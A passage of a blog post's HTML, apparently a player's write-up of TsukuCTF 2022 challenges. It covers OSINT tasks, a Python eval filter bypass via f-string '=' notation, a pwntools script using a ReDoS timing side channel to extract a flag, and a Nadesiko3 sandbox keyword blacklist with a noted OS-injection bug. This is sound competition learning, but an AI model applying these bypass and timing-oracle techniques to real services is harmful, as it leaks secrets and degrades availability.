662px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/17b797c01a1ede69b9bea5f993b3e52d/be86f/image-20221023192107089.png\"\n            alt=\"image-20221023192107089\"\n            title=\"image-20221023192107089\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>I wanted to see what was happening before the redirect, so I tried intercepting with Burp — but found nothing that pointed toward the Flag.</p>\n<p>I then searched the domain in <a href=\"https://lookup.icann.org/en\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">ICANN Lookup</a> and got some results, but nothing useful.</p>\n<p>Honestly, even if I had figured out the Punycode on my own, I would have been stuck here. Looking at the writeup, since TLS connections to the target domain are possible, you need to check the certificate on <a href=\"https://crt.sh/\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">crt.sh</a>.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/123b2afab8a5849b26da974042b0e24a/7bf07/image-20221023193626330.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 19.583333333333332%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA70lEQVQY02WPTUvDQBCG89u9CL2JV3+DV0+epFQUEVSoprU1KW02NclmN1+7ySaPaTyJAy8zh3ned8bjXw3QDyS25Gq7YJNEFFKSZpJqG9FuA7SBzvV/qeG3e9Za+r7HjQvtKNv1ZLlGlw3HQqJMTlalKKkwTy31c4Muatqhm8I75yb+NA+jq6eVoqgtjxvNy6fgfR3w5ge8rgJ2/pFwHhLOYoqLlmQu+bhbsTuLyS9rwmXD/VfOw1oRKzOZeqcza9Phi4pDnPIdC8QhQqR7skWOmlmaa4crHeWNRZ1b7O2A044wqkeuZLkvEbmZXv4BUv0uHTf3OSAAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/123b2afab8a5849b26da974042b0e24a/8ac56/image-20221023193626330.webp 240w,\n/static/123b2afab8a5849b26da974042b0e24a/d3be9/image-20221023193626330.webp 480w,\n/static/123b2afab8a5849b26da974042b0e24a/e46b2/image-20221023193626330.webp 960w,\n/static/123b2afab8a5849b26da974042b0e24a/d9e4a/image-20221023193626330.webp 1128w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/123b2afab8a5849b26da974042b0e24a/8ff5a/image-20221023193626330.png 240w,\n/static/123b2afab8a5849b26da974042b0e24a/e85cb/image-20221023193626330.png 480w,\n/static/123b2afab8a5849b26da974042b0e24a/d9199/image-20221023193626330.png 960w,\n/static/123b2afab8a5849b26da974042b0e24a/7bf07/image-20221023193626330.png 1128w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/123b2afab8a5849b26da974042b0e24a/d9199/image-20221023193626330.png\"\n            alt=\"image-20221023193626330\"\n            title=\"image-20221023193626330\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>I recalled getting tripped up by a crt.sh challenge before — and this time I learned that certificate registration can be a way to enumerate subdomains.</p>\n<h3 id=\"utsukushii\" style=\"position:relative;\"><a href=\"#utsukushii\" aria-label=\"utsukushii permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>uTSUKUSHIi</h3>\n<blockquote>\n<p><strong>medium</strong></p>\n<p>I found a photo of the world’s cutest cat. Please tell me this cat’s date of birth. The flag format is <code class=\"language-text\">TsukuCTF22{YYYY/MM/DD}</code>.</p>\n</blockquote>\n<p>This challenge gave us a photo of a cute cat.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/0928039d0f0856317547d2d9a6890d97/9568a/meow.jpg\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 133.33333333333331%; position: relative; bottom: 0; left: 0; background-image: url('data:image/jpeg;base64,/9j/2wBDABALDA4MChAODQ4SERATGCgaGBYWGDEjJR0oOjM9PDkzODdASFxOQERXRTc4UG1RV19iZ2hnPk1xeXBkeFxlZ2P/2wBDARESEhgVGC8aGi9jQjhCY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2P/wgARCAAbABQDASIAAhEBAxEB/8QAFwABAQEBAAAAAAAAAAAAAAAABAMABf/EABYBAQEBAAAAAAAAAAAAAAAAAAIDAf/aAAwDAQACEAMQAAABsZRjtdXQpMiJ2DtzcF//xAAdEAACAQQDAAAAAAAAAAAAAAABAgADEBExEyEi/9oACAEBAAEFAqSlYa+H9x3xGVObu2oCpB1b/8QAGBEAAgMAAAAAAAAAAAAAAAAAABARIUH/2gAIAQMBAT8B0tSf/8QAGBEBAQADAAAAAAAAAAAAAAAAEQABAhD/2gAIAQIBAT8ByEa8L//EABwQAAICAgMAAAAAAAAAAAAAAAABAhARITFBYv/aAAgBAQAGPwJ5ZKODik13u4eTQ7//xAAcEAADAQEAAwEAAAAAAAAAAAAAAREhQTFhkXH/2gAIAQEAAT8hRvKrhFcvKNK5X1GN+xtFa6wrDutKxdErizP6XHgN8GcGkf/aAAwDAQACAAMAAAAQExQy/8QAGBEAAwEBAAAAAAAAAAAAAAAAAAEREFH/2gAIAQMBAT8QVYnQsf/EABoRAAICAwAAAAAAAAAAAAAAAAABEBEhQWH/2gAIAQIBAT8QRK6OQ3io/wD/xAAeEAEAAgICAwEAAAAAAAAAAAABABEhMVFxgaGx4f/aAAgBAQABPxB6gCxUeWBWSHOpXqZ4q4YilUWu9EZQmw1bUm0YI6hpFpYFUtRHhBheit/YGQexEGF/KIU6Ja0T/9k='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/0928039d0f0856317547d2d9a6890d97/8ac56/meow.webp 240w,\n/static/0928039d0f0856317547d2d9a6890d97/d3be9/meow.webp 480w,\n/static/0928039d0f0856317547d2d9a6890d97/e46b2/meow.webp 960w,\n/static/0928039d0f0856317547d2d9a6890d97/f992d/meow.webp 1440w,\n/static/0928039d0f0856317547d2d9a6890d97/882b9/meow.webp 1920w,\n/static/0928039d0f0856317547d2d9a6890d97/e51ec/meow.webp 3024w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/0928039d0f0856317547d2d9a6890d97/09b79/meow.jpg 240w,\n/static/0928039d0f0856317547d2d9a6890d97/7cc5e/meow.jpg 480w,\n/static/0928039d0f0856317547d2d9a6890d97/6a068/meow.jpg 960w,\n/static/0928039d0f0856317547d2d9a6890d97/644c5/meow.jpg 1440w,\n/static/0928039d0f0856317547d2d9a6890d97/0f98f/meow.jpg 1920w,\n/static/0928039d0f0856317547d2d9a6890d97/9568a/meow.jpg 3024w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/jpeg\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/0928039d0f0856317547d2d9a6890d97/6a068/meow.jpg\"\n            alt=\"meow\"\n            title=\"meow\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>I tried reverse-searching by the cat, sofa, and so on, but couldn’t find the right photo.</p>\n<p>One of my teammates suggested “this looks like a cat café”, so we focused the search there — but that alone wasn’t narrow enough, and I retired.</p>\n<p>Looking at the following writeup, the key was inferring the location and style of the furnishings to find Flag-relevant information. (Impressive OSINT skills…)</p>\n<p>Reference: <a href=\"https://zenn.dev/mmrz/articles/2920cf099124f3\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Participated in TsukuCTF 2022</a></p>\n<p>The technique of approaching it from the concept/theme angle was a great learning experience and worth recording.</p>\n<h2 id=\"misc\" style=\"position:relative;\"><a href=\"#misc\" aria-label=\"misc permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Misc</h2>\n<h3 id=\"lucky-number-777\" style=\"position:relative;\"><a href=\"#lucky-number-777\" aria-label=\"lucky number 777 permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Lucky Number 777</h3>\n<p>This was solved by a teammate, but it’s a syntax-abuse problem I want to note down.</p>\n<p>The following script was provided.</p>\n<p>Several special characters are blacklisted, and the line <code class=\"language-text\">lucky_number == \"flag\" or \"{flag}\" in lucky_number</code> blocks both direct reference to the <code class=\"language-text\">flag</code> variable and expansion via <code class=\"language-text\">{flag}</code>.</p>\n<p>The challenge was to bypass these filters and get <code class=\"language-text\">str(eval(lucky_number))</code> to output the <code class=\"language-text\">flag</code> variable.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">import</span> string\n\n<span class=\"token keyword\">def</span> <span class=\"token function\">challenge</span><span class=\"token punctuation\">(</span>lucky_number<span class=\"token punctuation\">:</span> <span class=\"token builtin\">str</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    flag <span class=\"token operator\">=</span> <span class=\"token string\">\"TsukuCTF22{THIS_IS_NOT_FLAG}\"</span>  <span class=\"token comment\"># TOP SECRET</span>\n    printable <span class=\"token operator\">=</span> string<span class=\"token punctuation\">.</span>printable\n    <span class=\"token builtin\">filter</span> <span class=\"token operator\">=</span> <span class=\"token string\">\"_[].,*+%: 　|()#\\\\\\t\\r\\v\\f\\n\"</span>  <span class=\"token comment\"># (￣ー￣)</span>\n\n    <span class=\"token keyword\">if</span> <span class=\"token keyword\">not</span> <span class=\"token builtin\">all</span><span class=\"token punctuation\">(</span>c <span class=\"token keyword\">in</span> printable <span class=\"token keyword\">for</span> c <span class=\"token keyword\">in</span> lucky_number<span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n        <span class=\"token keyword\">return</span> <span class=\"token string\">\"No Hack!!!\"</span>\n\n    <span class=\"token keyword\">if</span> <span class=\"token builtin\">any</span><span class=\"token punctuation\">(</span>c <span class=\"token keyword\">in</span> <span class=\"token builtin\">filter</span> <span class=\"token keyword\">for</span> c <span class=\"token keyword\">in</span> lucky_number<span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n        <span class=\"token keyword\">return</span> <span class=\"token string\">\"No Hack!!!\"</span>\n\n    <span class=\"token keyword\">if</span> lucky_number <span class=\"token operator\">==</span> <span class=\"token string\">\"flag\"</span> <span class=\"token keyword\">or</span> <span class=\"token string\">\"{flag}\"</span> <span class=\"token keyword\">in</span> lucky_number<span class=\"token punctuation\">:</span>\n        <span class=\"token keyword\">return</span> <span class=\"token string\">\"No Hack!!!\"</span>\n\n    <span class=\"token keyword\">try</span><span class=\"token punctuation\">:</span>\n        <span class=\"token keyword\">return</span> <span class=\"token string\">\"your lucky_number is \"</span> <span class=\"token operator\">+</span> <span class=\"token builtin\">str</span><span class=\"token punctuation\">(</span><span class=\"token builtin\">eval</span><span class=\"token punctuation\">(</span>lucky_number<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n    <span class=\"token keyword\">except</span><span class=\"token punctuation\">:</span>\n        <span class=\"token keyword\">return</span> <span class=\"token string\">\"No Hack!!!\"</span></code></pre></div>\n<p>Connecting to the challenge server reveals it’s running Python 3.9.4:</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ <span class=\"token function\">nc</span> tsukuctf.sechack365.com <span class=\"token number\">7777</span>\n<span class=\"token number\">3.9</span>.4 <span class=\"token punctuation\">(</span>default, Apr <span class=\"token number\">10</span> <span class=\"token number\">2021</span>, <span class=\"token number\">15</span>:31:19<span class=\"token punctuation\">)</span>\n<span class=\"token punctuation\">[</span>GCC <span class=\"token number\">8.3</span>.0<span class=\"token punctuation\">]</span>\nEnter your lucky number:</code></pre></div>\n<p>The <code class=\"language-text\">eval</code> function itself is powerful, but the filters prevent string concatenation and method calls.</p>\n<p>However, <code class=\"language-text\">{}</code> and <code class=\"language-text\">=</code> are not filtered, so the <code class=\"language-text\">f\"{flag=}\"</code> notation can be used to print the Flag.</p>\n<p>This notation was added in Python 3.8 — a relatively new feature.</p>\n<p>Reference: <a href=\"https://docs.python.org/3/reference/lexical_analysis.html#f-strings\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">2. Lexical analysis — Python 3.10.8 documentation</a></p>\n<h3 id=\"soder\" style=\"position:relative;\"><a href=\"#soder\" aria-label=\"soder permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>soder</h3>\n<blockquote>\n<p>I made a validator for the flag, but it always returns the same response.\n<em>The flag format is TsukuCTF22{[0-9a-z_]+}. The problem accepts many requests, but please space them a few seconds apart.</em></p>\n</blockquote>\n<p>The following script is provided:</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token comment\">#!/usr/bin/env python3</span>\n<span class=\"token keyword\">import</span> os\n<span class=\"token keyword\">import</span> re\n<span class=\"token keyword\">from</span> timeout_decorator <span class=\"token keyword\">import</span> timeout\n\nFLAG <span class=\"token operator\">=</span> os<span class=\"token punctuation\">.</span>getenv<span class=\"token punctuation\">(</span><span class=\"token string\">\"FLAG\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"TsukuCTF22{dummy_flag}\"</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token decorator annotation punctuation\">@timeout</span><span class=\"token punctuation\">(</span><span class=\"token number\">5</span><span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">def</span> <span class=\"token function\">flag_validator</span><span class=\"token punctuation\">(</span>pattern<span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    re<span class=\"token punctuation\">.</span><span class=\"token keyword\">match</span><span class=\"token punctuation\">(</span>pattern<span class=\"token punctuation\">,</span> FLAG<span class=\"token punctuation\">)</span>\n\n<span class=\"token keyword\">def</span> <span class=\"token function\">yakitori</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    pattern <span class=\"token operator\">=</span> <span class=\"token builtin\">input</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Pattern: \"</span><span class=\"token punctuation\">)</span>\n    <span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"I check your pattern.\"</span><span class=\"token punctuation\">)</span>\n    <span class=\"token keyword\">try</span><span class=\"token punctuation\">:</span>\n        <span class=\"token comment\"># This function will be timed out in 5 seconds.</span>\n        flag_validator<span class=\"token punctuation\">(</span>pattern<span class=\"token punctuation\">)</span>\n    <span class=\"token keyword\">except</span><span class=\"token punctuation\">:</span>\n        <span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"error\"</span><span class=\"token punctuation\">)</span>\n\n    <span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Probably valid flag!\"</span><span class=\"token punctuation\">)</span>\n\nyakitori<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span></code></pre></div>\n<p>This script uses the received pattern to validate against the Flag.</p>\n<p>However, the script returns the same response regardless of whether validation succeeds or fails.</p>\n<p>There is also a 5-second timeout, but hitting that timeout also produces the same response.</p>\n<p>The key insight is that <code class=\"language-text\">re.match()</code> evaluates from the beginning and stops as soon as the regex matches.</p>\n<p>Therefore, by placing an intentionally slow (ReDoS-vulnerable) regex at the end and an arbitrary pattern at the beginning, we can use timing as a side-channel to determine whether the prefix matched.</p>\n<p>The general approach came to me quickly, but I spent a bit of time on how to deliberately slow down the regex.</p>\n<p>In the end, I intentionally crafted a ReDoS-vulnerable regex to trigger the timeout.</p>\n<p>Reference: <a href=\"http://www.rcc.ritsumei.ac.jp/2021/1220_12435/\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Day 20: 3 Rules of Thumb for ReDoS Vulnerability | Ritsumeikan Computer Club</a></p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">Quote:\nThree Rules of Thumb <span class=\"token keyword\">for</span> ReDoS Vulnerability\n\n<span class=\"token number\">1</span>. Nested quantifiers\n   Matching <span class=\"token function\">time</span> grows exponentially. e.g. <span class=\"token punctuation\">(</span>a+<span class=\"token punctuation\">)</span>+b\n\n<span class=\"token number\">2</span>. Repeated pattern that can match both alternatives <span class=\"token keyword\">in</span> a choice\n   Matching <span class=\"token function\">time</span> grows exponentially. e.g. <span class=\"token punctuation\">(</span>a<span class=\"token operator\">|</span><span class=\"token builtin class-name\">.</span><span class=\"token punctuation\">)</span>+b\n\n<span class=\"token number\">3</span>. Concatenated repetition expressions\n   Matching <span class=\"token function\">time</span> grows polynomially. e.g. a.+b.+c</code></pre></div>\n<p>The following script was ultimately used to retrieve the Flag:</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">import</span> time\n<span class=\"token keyword\">import</span> re\n<span class=\"token keyword\">import</span> string\n\n<span class=\"token keyword\">from</span> pwn <span class=\"token keyword\">import</span> <span class=\"token operator\">*</span>\n<span class=\"token keyword\">import</span> binascii\n\npt <span class=\"token operator\">=</span> <span class=\"token string\">r\"|(.+)+a\"</span>\n\nflag <span class=\"token operator\">=</span> <span class=\"token string\">\"TsukuCTF22{\"</span>\nwords <span class=\"token operator\">=</span> <span class=\"token string\">\"abcdefghijklmnopqrstuvwxyz0123456789_\"</span>\n\n<span class=\"token keyword\">for</span> i <span class=\"token keyword\">in</span> <span class=\"token builtin\">range</span><span class=\"token punctuation\">(</span><span class=\"token number\">25</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    <span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span>i<span class=\"token punctuation\">,</span> flag<span class=\"token punctuation\">)</span>\n    <span class=\"token keyword\">for</span> w <span class=\"token keyword\">in</span> words<span class=\"token punctuation\">:</span>\n        test <span class=\"token operator\">=</span> flag <span class=\"token operator\">+</span> <span class=\"token string\">r\"[\"</span> <span class=\"token operator\">+</span> w <span class=\"token operator\">+</span> <span class=\"token string\">r\"]{\"</span> <span class=\"token operator\">+</span> <span class=\"token builtin\">str</span><span class=\"token punctuation\">(</span><span class=\"token number\">1</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">+</span> <span class=\"token string\">r\"}.{\"</span> <span class=\"token operator\">+</span> <span class=\"token builtin\">str</span><span class=\"token punctuation\">(</span><span class=\"token number\">24</span><span class=\"token operator\">-</span>i<span class=\"token punctuation\">)</span> <span class=\"token operator\">+</span> <span class=\"token string\">r\"}}\"</span>\n\n        p <span class=\"token operator\">=</span> remote<span class=\"token punctuation\">(</span><span class=\"token string\">\"133.130.103.51\"</span><span class=\"token punctuation\">,</span> <span class=\"token number\">31417</span><span class=\"token punctuation\">)</span>\n        r <span class=\"token operator\">=</span> p<span class=\"token punctuation\">.</span>recv<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n\n        start <span class=\"token operator\">=</span> time<span class=\"token punctuation\">.</span>time<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n        p<span class=\"token punctuation\">.</span>sendline<span class=\"token punctuation\">(</span>test<span class=\"token operator\">+</span>pt<span class=\"token punctuation\">)</span>\n        r <span class=\"token operator\">=</span> p<span class=\"token punctuation\">.</span>recvline<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n        r <span class=\"token operator\">=</span> p<span class=\"token punctuation\">.</span>recvline<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n        t <span class=\"token operator\">=</span> time<span class=\"token punctuation\">.</span>time<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">-</span> start\n        p<span class=\"token punctuation\">.</span>close<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n\n        <span class=\"token keyword\">if</span> t <span class=\"token operator\">&lt;</span> <span class=\"token number\">1</span><span class=\"token punctuation\">:</span>\n            flag <span class=\"token operator\">+=</span> w\n            <span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span>flag<span class=\"token punctuation\">)</span>\n            <span class=\"token keyword\">break</span>\n        \n        time<span class=\"token punctuation\">.</span>sleep<span class=\"token punctuation\">(</span><span class=\"token number\">1</span><span class=\"token punctuation\">)</span></code></pre></div>\n<h3 id=\"nako3ndbox\" style=\"position:relative;\"><a href=\"#nako3ndbox\" aria-label=\"nako3ndbox permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>nako3ndbox</h3>\n<blockquote>\n<p>Let’s play in Japanese</p>\n</blockquote>\n<p>The server was running the following program written in Nadesiko 3 (なでしこ3):</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">「------------------------------------------------------------\n             _        _____           _ _\n _ __   __ _<span class=\"token operator\">|</span> <span class=\"token operator\">|</span> _____<span class=\"token operator\">|</span>___ / _ __   __<span class=\"token operator\">|</span> <span class=\"token operator\">|</span> <span class=\"token operator\">|</span>__   _____  __\n<span class=\"token operator\">|</span> <span class=\"token string\">'_ \\ / _` | |/ / _ \\ |_ \\| '</span>_ <span class=\"token punctuation\">\\</span> / _` <span class=\"token operator\">|</span> '_ <span class=\"token punctuation\">\\</span> / _ <span class=\"token punctuation\">\\</span> <span class=\"token punctuation\">\\</span>/ /\n<span class=\"token operator\">|</span> <span class=\"token operator\">|</span> <span class=\"token operator\">|</span> <span class=\"token operator\">|</span> <span class=\"token punctuation\">(</span>_<span class=\"token operator\">|</span> <span class=\"token operator\">|</span>   <span class=\"token operator\">&lt;</span> <span class=\"token punctuation\">(</span>_<span class=\"token punctuation\">)</span> <span class=\"token operator\">|</span>__<span class=\"token punctuation\">)</span> <span class=\"token operator\">|</span> <span class=\"token operator\">|</span> <span class=\"token operator\">|</span> <span class=\"token operator\">|</span> <span class=\"token punctuation\">(</span>_<span class=\"token operator\">|</span> <span class=\"token operator\">|</span> <span class=\"token operator\">|</span>_<span class=\"token punctuation\">)</span> <span class=\"token operator\">|</span> <span class=\"token punctuation\">(</span>_<span class=\"token punctuation\">)</span> <span class=\"token operator\">></span>  <span class=\"token operator\">&lt;</span>\n<span class=\"token operator\">|</span>_<span class=\"token operator\">|</span> <span class=\"token operator\">|</span>_<span class=\"token operator\">|</span><span class=\"token punctuation\">\\</span>__,_<span class=\"token operator\">|</span>_<span class=\"token operator\">|</span><span class=\"token punctuation\">\\</span>_<span class=\"token punctuation\">\\</span>___/____/<span class=\"token operator\">|</span>_<span class=\"token operator\">|</span> <span class=\"token operator\">|</span>_<span class=\"token operator\">|</span><span class=\"token punctuation\">\\</span>__,_<span class=\"token operator\">|</span>_.__/ <span class=\"token punctuation\">\\</span>___/_/<span class=\"token punctuation\">\\</span>_<span class=\"token punctuation\">\\</span>\n\n------------------------------------------------------------」と言う\n\n「日本語コード：」と尋ねる\nそれを入力に代入\n\nブラックリスト＝「読、開、保存、実行、起動、サーバ、フォルダ、ファイル、ナデシコ、ディレクトリ、flag」を「、」で区切る\n\nブラックリスト！＝空の間\n　　ブラックリストの０から１を配列取り出す\n　　もし（入力でそれの出現回数）！＝０ならば\n　　　　「日本語の世界からは出しませんよ！！！」と言う\n　　　　終了する\n　　ここまで\nここまで\n\n「｛入力｝」をナデシコする\n\n終了する</code></pre></div>\n<p>Characters defined in the “blacklist” are blocked, preventing direct file operations and similar commands.</p>\n<p>The running version of Nadesiko was <code class=\"language-text\">nadesiko3@3.3.67</code>, so I searched GitHub for vulnerability or bug reports and found that this version contains an OS injection vulnerability.</p>\n<p>Reference: <a href=\"https://github.com/kujirahand/nadesiko3/issues/1325\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Issue with cnako3 compression/decompression · Issue #1325 · kujirahand/nadesiko3</a></p>\n<p>I got excited and tried various exploit permutations to get the Flag, but never succeeded and retired.</p>\n<p>Part of the issue was my exploit skills, but I was also too fixated on confirming success via console output.</p>\n<p>When the response wasn’t coming back, I assumed it had failed — but apparently it had actually succeeded.</p>\n<p>As the writeup explains, the Flag cannot be retrieved via console output alone; you need to execute a command that transfers the file to a remote host.</p>\n<p>This was the challenge I most wanted to solve, so it stings.</p>\n<h2 id=\"wrap-up\" style=\"position:relative;\"><a href=\"#wrap-up\" aria-label=\"wrap up permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Wrap-up</h2>\n<p>It was great to get back out competing as 0neP@dding after a while, and we had a lot of fun.</p>\n<p>That said, having just two people felt a bit lonely, so I’m thinking it’s time to recruit more members 